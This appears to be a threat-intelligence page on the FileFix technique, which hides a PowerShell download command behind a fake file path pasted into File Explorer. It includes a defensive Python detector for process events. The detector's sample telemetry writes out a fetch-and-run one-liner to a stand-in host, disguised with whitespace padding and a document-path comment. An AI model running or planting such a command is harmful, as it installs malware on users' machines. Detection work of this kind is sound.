
CrazyHunter Ransomware
CrazyHunter is a ransomware campaign targeting healthcare that weakens endpoint defenses and escalates privileges before encrypting systems at scale.

FileFix is a social engineering technique that builds on the widely abused ClickFix tactic. Where ClickFix tricks users into running attacker-supplied commands through the Windows Run dialog or a terminal, FileFix abuses the Windows File Explorer address bar instead. A malicious webpage opens a legitimate File Explorer window and silently places a disguised PowerShell command on the user's clipboard; the command is padded with whitespace and ends in a comment that looks like a file path, so only the fake path is visible once it is pasted. The user is then told to paste this "path" into the address bar, and Explorer executes the hidden command, which downloads and runs malware. Payloads delivered through FileFix have included Remote Access Trojans (RATs) and information stealers, giving attackers access to sensitive data and systems. Organizations across sectors, including finance, healthcare, and education, are at risk, because the technique sidesteps the security warnings that normally accompany a download and relies on the user's trust in a familiar interface.
In mid-July 2025, a DFIR report covered the abuse of FileFix to deliver a new, evolved Interlock RAT variant in an active campaign. Note that although the execution paths of FileFix and ClickFix differ, the commands themselves are likely to be similar and to leave comparable artifacts (for example, PowerShell launched with explorer.exe as its parent process). The packages in this collection are based on the FileFix reporting available at this time; attackers may also adopt commands from ClickFix lures, as they have with other execution techniques.
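As an added illustration of the execution chain described above, and of the overlap with ClickFix commands noted in the second paragraph, the following Python is a heuristic detector over process-creation events. It is example code written for this page, not content from the original article, the HUNTER platform or any vendor; the event fields (parent image, image, command line) are an assumption modelled on Sysmon Event ID 1 style telemetry, the indicator regexes are assumed starting points to tune against your own data, and every sample event is constructed.

```python
"""Heuristic detection of FileFix-style pastes into the File Explorer address bar.

Added example, not content from the original page or the HUNTER platform.
It scores process-creation events (fields modelled on Sysmon Event ID 1 /
EDR telemetry, an assumption) for the FileFix chain: explorer.exe spawning
a script host whose command line hides the real PowerShell command behind
whitespace padding and a trailing '#' comment shaped like a document path,
so the address bar appears to contain only a file path. The same parent /
encoded-command heuristics also catch Run-dialog ClickFix lures.
Every event below is constructed for the example.
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Assumed indicator patterns; tune against your own telemetry.
DOWNLOAD_TOKENS = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|certutil|curl)\b|https?://", re.I)
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
# '#' comment followed by a drive or UNC path ending in a document extension
FAKE_PATH_COMMENT = re.compile(r"#\s*(?:[A-Za-z]:\\|\\\\)[^\r\n]*\.(?:pdf|docx?|xlsx?|txt|zip)\b", re.I)
PADDING = re.compile(r"\s{8,}")  # spaces push the fake path into the visible part of the address bar


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    score: int = 0
    reasons: List[str] = field(default_factory=list)

    def add(self, points: int, why: str) -> None:
        self.score += points
        self.reasons.append(why)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: ProcEvent) -> Finding:
    """Return a suspicion score with reasons; 0 means nothing matched."""
    f = Finding()
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return f
    if _basename(ev.parent_image) == "explorer.exe":
        f.add(2, "script host spawned by explorer.exe (address bar or Run dialog)")
    cl = ev.command_line
    if FAKE_PATH_COMMENT.search(cl):
        f.add(3, "trailing '#' comment shaped like a document path")
    if PADDING.search(cl):
        f.add(2, "long whitespace run hides the real command")
    if DOWNLOAD_TOKENS.search(cl):
        f.add(2, "fetches a second stage over HTTP")
    if ENCODED_FLAG.search(cl):
        f.add(2, "encoded command")
    return f


def scan(events: List[ProcEvent], threshold: int = 4) -> List[Tuple[int, Finding]]:
    """Indices of events scoring at or above threshold, with their findings."""
    hits = []
    for i, ev in enumerate(events):
        f = score_event(ev)
        if f.score >= threshold:
            hits.append((i, f))
    return hits


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # FileFix paste: hidden download command, padding, fake document path in a comment
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c iwr https://example.invalid/x.ps1 | iex"
              + " " * 24 + r"# C:\company\internal-secure\Q3-report.pdf"),
    # User simply opened PowerShell from the Start menu
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
    # Scheduled maintenance script launched from cmd.exe
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # ClickFix-style Run-dialog paste with an encoded command (blob is dummy data)
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAA=="),
]

if __name__ == "__main__":
    for i, f in scan(SAMPLE_EVENTS):
        print(f"event {i}: score {f.score}: " + "; ".join(f.reasons))
```

Run as a script it reports events 0 and 3. The scoring is deliberately additive: explorer.exe as parent is common for benign interactive launches, so it only contributes; the fake-path comment and padding are what single out FileFix, while the encoded-command and download checks carry over to the ClickFix lures the page expects attackers to reuse.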


DevMan Ransomware is a newly emerging ransomware operation observed in 2025 that has been assessed as a derivative of the DragonForce ransomware family.

Gootloader resurfaced with enhanced capabilities, building on the multi-stage loader malware first seen in 2020.